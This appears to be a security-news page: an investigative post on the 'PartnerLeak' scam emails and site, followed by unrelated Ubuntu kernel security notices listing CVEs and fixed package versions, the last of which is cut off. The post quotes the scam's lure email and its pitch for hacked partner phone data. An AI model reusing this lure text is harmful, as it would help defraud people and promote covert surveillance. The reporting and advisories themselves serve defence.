We dug into PartnerLeak, the site behind the "your partner is cheating on you" emails, including how and where the scammers get their information.

Earlier this week, we reported on a new type of scam that tells you your partner is cheating on you. However, we hit a dead end because we were unable to get hold of an original copy of the email.

That was until the scammers were “kind enough” to send one to one of our co-workers.

your partner is cheating on you and we have proof

> “Hi (target’s name\],
> 
> \[Partner’s name\] is cheating on you. Here is proof.
> 
> As a company engaged in cyber security we’ve found information related to \[partner’s name\] that might interest you.
> 
> We made a full backup of \[his/her\] disk. (We have all \[his/her\] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all \[his/her\] contacts) and are willing to give you a full access to this data. For more details visit our website.”

With this, we were able to investigate the scammers’ intentions.

All three of the links in the email (Here, website, and Check now) point to the same website. Through a landing page located at click\[.\]cardfoolops\[.\]com visitors are redirected to partnerleak\[.\]com.

The partnerleak\[.\]com domain was registered on August 1, 2024, with NameCheap anonymously. Anonymous registration doesn’t automatically mean the person registering is up to no good, but it did block us from researching this avenue any further.

The registration date, however, matches with the first complaints we started seeing about these emails.

Malwarebytes blocks partnerleak\[.\]com

During the redirection process, your email address is passed on, which means when you register at the site your email address is already filled out.

Email address is transmitted and pre-filled

The PartnerLeak site itself says it offers anonymity, as well as “crucial insights” into the behaviour of the one you love.

> “completely anonymous service leverages artificial intelligence and the vulnerabilities of popular smartphones to provide crucial insights into your partner’s behavior.”

> “**Are You Concerned About Your Partner’s Honesty?**
> 
> If you’ve decided to take a leap into a relationship but find yourself questioning your partner’s honesty, or if you’ve been together for a while and something feels off, we have a solution for you.
> 
> **Our Service**
> 
> Our completely anonymous service leverages artificial intelligence and the vulnerabilities of popular smartphones to provide crucial insights into your partner’s behavior. Here’s how it works:
> 
> Data Backup Access: You can download a backup from iCloud or Google, which includes:
> 
> *   Device location tracking
> *   Movement history with timestamps
> *   Correspondence from popular messaging apps like Telegram, WhatsApp, and iMessage
> *   Photo and video materials stored on the smartphone
> 
> Social Media Analysis: Utilizing AI and extensive data, our service can:
> 
> *   Check user registration and analyze behavior on platforms like Facebook and Twitter
> *   Investigate activity on popular dating apps such as Tinder, AdultFriendFinder, Hinge, and OkCupid
> 
> This comprehensive analysis helps you verify the reliability of your potential partner based on criteria that matter most to you.
> 
> **Commitment to Anonymity and Privacy**
> 
> *   Anonymous Transactions: We prioritize your anonymity by processing payments through cryptocurrencies, ensuring that your partner will remain unaware of your inquiries.
> *   Data Privacy: Your privacy is of utmost importance. We offer the option to permanently delete any data related to you from our system.
> 
> Take control of your relationship concerns today with our discreet and effective service!”

Nowhere on the site does it specify how much such an investigation would cost, but after registration you can start a search at which point it will tell you to top up your balance.

You don’t have free search. Please top up balance or try use different email.

To top up your balance there are three payment options:

*   Credit card
*   Bitcoin
*   Ethereum

We checked the balances on the cryptocurrency accounts they provided and we are happy to report that those are both dead in the water. We can only hope that the PartnerLeak revenue from credit cards looks the same, although that is probably wishful thinking on our part.

An empty and inactive Bitcoin wallet

An equally empty Ethereum account

Our investigation into where the scammers were getting the necessary information always pointed in the same direction: The Knot, a wedding services company.

However, we couldn’t find any breaches of its site or any tangible evidence that it was anything more than just a source of information. Like many other similar sites, it is easy to find a partner name on the site if you already have the name and email of the other partner.

But since many victims, including our co-worker, used The Knot’s services, we contacted them and received this statement from a spokesperson:

> “We were notified of user concerns, and after investigation by our cybersecurity team, determined there is no evidence of unauthorized access to our systems.”

Regardless of where the scammers are getting their data, let’s keep their balance at zero and spread the word.

**How to react to your partner “is cheating on you” emails**

First and foremost, never reply to emails of this kind. That tells the sender that someone is reading the emails sent to that address, and will lead to them trying other ways to defraud you.

*   If the email includes a password, make sure you are not using it any more _on any account_. If you are, change it as soon as possible.
*   If you are having trouble remembering all your passwords, have a look at a password manager.
*   Don’t let yourself get rushed into doing something. Scammers rely on time pressure that leads to people making quick decisions.
*   Do not open unsolicited attachments. Especially when the sender address is suspicious, or even appears to be your own.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 PartnerLeak scam site promises victims full access to &#8220;cheating&#8221; partner&#8217;s stolen data 

Ubuntu Security Notice 7003-2 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-2September 12, 2024linux-aws-5.4, linux-azure-5.4, linux-gcp-5.4, linux-hwe-5.4,linux-ibm-5.4, linux-oracle-5.4, linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-40941, CVE-2024-42086, CVE-2024-41097, CVE-2024-40958,CVE-2024-41089, CVE-2024-40942, CVE-2024-40968, CVE-2024-40934,CVE-2024-40902, CVE-2024-42124, CVE-2023-52887, CVE-2024-42115,CVE-2024-41041, CVE-2024-39501, CVE-2024-40932, CVE-2024-42102,CVE-2024-40960, CVE-2024-39487, CVE-2024-39503, CVE-2024-40945,CVE-2024-40959, CVE-2024-40987, CVE-2024-40995, CVE-2024-40988,CVE-2024-42084, CVE-2024-40943, CVE-2024-42070, CVE-2024-40904,CVE-2024-41049, CVE-2024-41046, CVE-2024-39502, CVE-2024-42097,CVE-2024-42090, CVE-2024-42236, CVE-2024-42223, CVE-2024-42094,CVE-2024-41007, CVE-2024-42105, CVE-2024-41035, CVE-2024-41087,CVE-2024-42157, CVE-2024-39495, CVE-2024-36894, CVE-2024-40916,CVE-2024-39469, CVE-2024-40974, CVE-2024-42153, CVE-2024-36974,CVE-2024-42096, CVE-2024-42232, CVE-2024-40980, CVE-2024-41034,CVE-2024-42087, CVE-2024-42093, CVE-2024-41095, CVE-2024-42145,CVE-2024-42148, CVE-2023-52803, CVE-2024-39499, CVE-2024-42104,CVE-2024-42224, CVE-2024-37078, CVE-2024-42092, CVE-2024-39505,CVE-2024-38619, CVE-2024-42106, CVE-2024-40978, CVE-2024-41044,CVE-2024-42089, CVE-2024-40981, CVE-2024-42154, CVE-2024-36978,CVE-2024-42076, CVE-2024-40984, CVE-2024-42127, CVE-2024-42119,CVE-2024-40961, CVE-2024-39509, CVE-2024-42101, CVE-2024-40901,CVE-2024-40963, CVE-2024-40905, CVE-2024-39506, CVE-2024-40912,CVE-2024-41006)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-5.4.0-1079-ibm      5.4.0-1079.84~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1115-raspi    5.4.0-1115.127~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1131-oracle   5.4.0-1131.140~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1132-aws      5.4.0-1132.142~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1136-gcp      5.4.0-1136.145~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1137-azure    5.4.0-1137.144~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-195-generic   5.4.0-195.215~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-195-lowlatency  5.4.0-195.215~18.04.1          Available with Ubuntu Pro  linux-image-aws                 5.4.0.1132.142~18.04.1          Available with Ubuntu Pro  linux-image-azure               5.4.0.1137.144~18.04.1          Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1136.145~18.04.1          Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1079.84~18.04.1          Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-oem                 5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-oracle              5.4.0.1131.140~18.04.1          Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1115.127~18.04.1          Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.195.215~18.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-2  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236

Ubuntu Security Notice USN-7003-2

Ubuntu Security Notice 7003-1 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-1September 12, 2024linux, linux-aws, linux-azure, linux-bluefield, linux-gcp, linux-gkeop,linux-ibm, linux-kvm, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-40905, CVE-2024-41095, CVE-2024-41035, CVE-2024-36974,CVE-2024-40959, CVE-2024-40978, CVE-2024-42236, CVE-2024-40963,CVE-2024-40916, CVE-2024-41006, CVE-2024-39495, CVE-2023-52803,CVE-2024-42070, CVE-2024-41041, CVE-2024-42157, CVE-2024-36894,CVE-2024-42153, CVE-2024-42127, CVE-2024-42224, CVE-2024-40932,CVE-2024-42105, CVE-2024-40968, CVE-2024-41044, CVE-2024-41046,CVE-2023-52887, CVE-2024-42094, CVE-2024-40960, CVE-2024-41007,CVE-2024-40961, CVE-2024-39487, CVE-2024-39502, CVE-2024-42086,CVE-2024-36978, CVE-2024-39503, CVE-2024-41049, CVE-2024-42090,CVE-2024-42232, CVE-2024-39499, CVE-2024-40902, CVE-2024-37078,CVE-2024-39501, CVE-2024-42119, CVE-2024-40901, CVE-2024-42101,CVE-2024-42104, CVE-2024-42145, CVE-2024-41097, CVE-2024-40942,CVE-2024-41034, CVE-2024-40904, CVE-2024-41089, CVE-2024-42084,CVE-2024-42093, CVE-2024-40945, CVE-2024-40958, CVE-2024-42124,CVE-2024-40987, CVE-2024-40912, CVE-2024-39506, CVE-2024-40941,CVE-2024-39509, CVE-2024-40974, CVE-2024-39505, CVE-2024-42115,CVE-2024-40988, CVE-2024-40995, CVE-2024-42097, CVE-2024-41087,CVE-2024-42106, CVE-2024-40984, CVE-2024-40981, CVE-2024-42102,CVE-2024-42148, CVE-2024-42154, CVE-2024-42096, CVE-2024-40934,CVE-2024-40980, CVE-2024-42076, CVE-2024-40943, CVE-2024-42092,CVE-2024-42089, CVE-2024-42223, CVE-2024-38619, CVE-2024-42087,CVE-2024-39469)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1079-ibm      5.4.0-1079.84  linux-image-5.4.0-1092-bluefield  5.4.0-1092.99  linux-image-5.4.0-1099-gkeop    5.4.0-1099.103  linux-image-5.4.0-1120-kvm      5.4.0-1120.128  linux-image-5.4.0-1131-oracle   5.4.0-1131.140  linux-image-5.4.0-1132-aws      5.4.0-1132.142  linux-image-5.4.0-1136-gcp      5.4.0-1136.145  linux-image-5.4.0-1137-azure    5.4.0-1137.144  linux-image-5.4.0-195-generic   5.4.0-195.215  linux-image-5.4.0-195-generic-lpae  5.4.0-195.215  linux-image-5.4.0-195-lowlatency  5.4.0-195.215  linux-image-aws-lts-20.04       5.4.0.1132.129  linux-image-azure-lts-20.04     5.4.0.1137.131  linux-image-bluefield           5.4.0.1092.88  linux-image-gcp-lts-20.04       5.4.0.1136.138  linux-image-generic             5.4.0.195.193  linux-image-generic-lpae        5.4.0.195.193  linux-image-gkeop               5.4.0.1099.97  linux-image-gkeop-5.4           5.4.0.1099.97  linux-image-ibm-lts-20.04       5.4.0.1079.108  linux-image-kvm                 5.4.0.1120.116  linux-image-lowlatency          5.4.0.195.193  linux-image-oem                 5.4.0.195.193  linux-image-oem-osp1            5.4.0.195.193  linux-image-oracle-lts-20.04    5.4.0.1131.124  linux-image-virtual             5.4.0.195.193After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-195.215  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1132.142  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1137.144  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1092.99  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1136.145  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1099.103  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1079.84  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1120.128  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1131.140

Ubuntu Security Notice USN-7003-1

Ubuntu Security Notice 6999-1 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6999-1September 11, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-lowlatency,linux-oem-6.8, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-lowlatency: Linux low latency kernel- linux-oem-6.8: Linux kernel for OEM systems- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - ACPI drivers;  - Drivers core;  - Null block device driver;  - Character device driver;  - TPM device driver;  - Clock framework and drivers;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - EFI core;  - FPGA Framework;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Mailbox framework;  - Media drivers;  - Microchip PCI driver;  - VMware VMCI Driver;  - Network drivers;  - PCI subsystem;  - x86 platform drivers;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Sonic Silicon Backplane drivers;  - Greybus lights staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - VFIO drivers;  - Framebuffer layer;  - Watchdog drivers;  - 9P distributed file system;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - Network file system server daemon;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Tracing file system;  - Tracing infrastructure;  - io_uring subsystem;  - Core kernel;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Memory management;  - 9P file system network protocol;  - Amateur Radio drivers;  - B.A.T.M.A.N. meshing protocol;  - Ethernet bridge;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - NET/ROM layer;  - NFC subsystem;  - Network traffic control;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - AppArmor security module;  - Integrity Measurement Architecture(IMA) framework;  - Landlock security;  - Linux Security Modules (LSM) Framework;  - SELinux security module;  - Simplified Mandatory Access Control Kernel framework;  - ALSA framework;  - HD-audio driver;  - SOF drivers;  - KVM core;(CVE-2024-40911, CVE-2024-37356, CVE-2024-40935, CVE-2024-40944,CVE-2024-41003, CVE-2024-40990, CVE-2024-40952, CVE-2024-40940,CVE-2024-40930, CVE-2024-40985, CVE-2024-40941, CVE-2024-38630,CVE-2024-39466, CVE-2024-40933, CVE-2024-38624, CVE-2024-40924,CVE-2024-40945, CVE-2024-40899, CVE-2024-38622, CVE-2024-40979,CVE-2024-36484, CVE-2024-41004, CVE-2024-39474, CVE-2022-48772,CVE-2024-36244, CVE-2024-38664, CVE-2024-40925, CVE-2024-40980,CVE-2024-39480, CVE-2024-36270, CVE-2024-40936, CVE-2024-40904,CVE-2024-38635, CVE-2024-40927, CVE-2024-36481, CVE-2024-40929,CVE-2024-40958, CVE-2024-36978, CVE-2024-40992, CVE-2024-40908,CVE-2024-39504, CVE-2024-41001, CVE-2024-40967, CVE-2023-52884,CVE-2024-40997, CVE-2024-40903, CVE-2024-40913, CVE-2024-34030,CVE-2024-39473, CVE-2024-40966, CVE-2024-40951, CVE-2024-40902,CVE-2024-40982, CVE-2024-40923, CVE-2024-39467, CVE-2024-40910,CVE-2024-40909, CVE-2024-39463, CVE-2024-40974, CVE-2024-41002,CVE-2024-39464, CVE-2024-39496, CVE-2024-41040, CVE-2024-39469,CVE-2024-39500, CVE-2024-39510, CVE-2024-38627, CVE-2024-32936,CVE-2024-40975, CVE-2024-38390, CVE-2024-40959, CVE-2024-41006,CVE-2024-40986, CVE-2024-40987, CVE-2024-40922, CVE-2024-40983,CVE-2024-37354, CVE-2024-38637, CVE-2024-39277, CVE-2024-40943,CVE-2024-39371, CVE-2024-40921, CVE-2024-40953, CVE-2024-38634,CVE-2024-38659, CVE-2024-39492, CVE-2024-40976, CVE-2024-40906,CVE-2024-40965, CVE-2024-38667, CVE-2024-39498, CVE-2024-38628,CVE-2024-38661, CVE-2024-38663, CVE-2024-40998, CVE-2024-40948,CVE-2024-38306, CVE-2024-40928, CVE-2024-39468, CVE-2024-39494,CVE-2024-39505, CVE-2024-40963, CVE-2024-39499, CVE-2024-39506,CVE-2024-40995, CVE-2024-39491, CVE-2024-40900, CVE-2024-39478,CVE-2024-39490, CVE-2024-39291, CVE-2024-40981, CVE-2024-40926,CVE-2024-40939, CVE-2024-38385, CVE-2024-39483, CVE-2024-40989,CVE-2024-40955, CVE-2024-39501, CVE-2024-38381, CVE-2024-33621,CVE-2024-40964, CVE-2024-42148, CVE-2024-36286, CVE-2024-38629,CVE-2024-39509, CVE-2024-39298, CVE-2024-36489, CVE-2024-34777,CVE-2024-40957, CVE-2024-40919, CVE-2024-39462, CVE-2024-39495,CVE-2024-39497, CVE-2024-38636, CVE-2024-36281, CVE-2024-39479,CVE-2024-40932, CVE-2024-36288, CVE-2024-38623, CVE-2024-40969,CVE-2024-40931, CVE-2024-36971, CVE-2024-40934, CVE-2024-36015,CVE-2024-39485, CVE-2024-40996, CVE-2024-39507, CVE-2024-36973,CVE-2024-38625, CVE-2024-39301, CVE-2024-34027, CVE-2024-37026,CVE-2024-40960, CVE-2024-37078, CVE-2024-40912, CVE-2024-40988,CVE-2024-41005, CVE-2024-39276, CVE-2024-38662, CVE-2024-39502,CVE-2024-36479, CVE-2024-40947, CVE-2024-38780, CVE-2024-38388,CVE-2024-40917, CVE-2024-36974, CVE-2024-40970, CVE-2024-40901,CVE-2024-38384, CVE-2024-39475, CVE-2024-40949, CVE-2024-37021,CVE-2024-38633, CVE-2024-39503, CVE-2024-41000, CVE-2024-33847,CVE-2024-35247, CVE-2024-40968, CVE-2024-33619, CVE-2024-38619,CVE-2024-40984, CVE-2024-36478, CVE-2024-39493, CVE-2024-42078,CVE-2024-40954, CVE-2024-40978, CVE-2024-39508, CVE-2024-40915,CVE-2024-39489, CVE-2024-40920, CVE-2024-38618, CVE-2024-40938,CVE-2024-39296, CVE-2024-40962, CVE-2024-39470, CVE-2024-39481,CVE-2024-40977, CVE-2024-38621, CVE-2024-40971, CVE-2024-31076,CVE-2024-36972, CVE-2024-39471, CVE-2024-40994, CVE-2024-40973,CVE-2024-40916, CVE-2024-40942, CVE-2024-40956, CVE-2024-39465,CVE-2024-40914, CVE-2024-40937, CVE-2024-40918, CVE-2024-40905,CVE-2024-39488, CVE-2024-38632, CVE-2024-39461, CVE-2024-40999,CVE-2024-40972, CVE-2024-36477, CVE-2024-40961)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1010-gke      6.8.0-1010.13  linux-image-6.8.0-1012-ibm      6.8.0-1012.12  linux-image-6.8.0-1012-oem      6.8.0-1012.12  linux-image-6.8.0-1012-oracle   6.8.0-1012.12  linux-image-6.8.0-1012-oracle-64k  6.8.0-1012.12  linux-image-6.8.0-1014-gcp      6.8.0-1014.16  linux-image-6.8.0-1015-aws      6.8.0-1015.16  linux-image-6.8.0-44-generic    6.8.0-44.44  linux-image-6.8.0-44-generic-64k  6.8.0-44.44  linux-image-6.8.0-44-lowlatency  6.8.0-44.44.1  linux-image-6.8.0-44-lowlatency-64k  6.8.0-44.44.1  linux-image-aws                 6.8.0-1015.16  linux-image-gcp                 6.8.0-1014.16  linux-image-generic             6.8.0-44.44  linux-image-generic-64k         6.8.0-44.44  linux-image-generic-64k-hwe-24.04  6.8.0-44.44  linux-image-generic-hwe-24.04   6.8.0-44.44  linux-image-generic-lpae        6.8.0-44.44  linux-image-gke                 6.8.0-1010.13  linux-image-ibm                 6.8.0-1012.12  linux-image-ibm-classic         6.8.0-1012.12  linux-image-ibm-lts-24.04       6.8.0-1012.12  linux-image-kvm                 6.8.0-44.44  linux-image-lowlatency          6.8.0-44.44.1  linux-image-lowlatency-64k      6.8.0-44.44.1  linux-image-oracle              6.8.0-1012.12  linux-image-oracle-64k          6.8.0-1012.12  linux-image-virtual             6.8.0-44.44  linux-image-virtual-hwe-24.04   6.8.0-44.44After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), 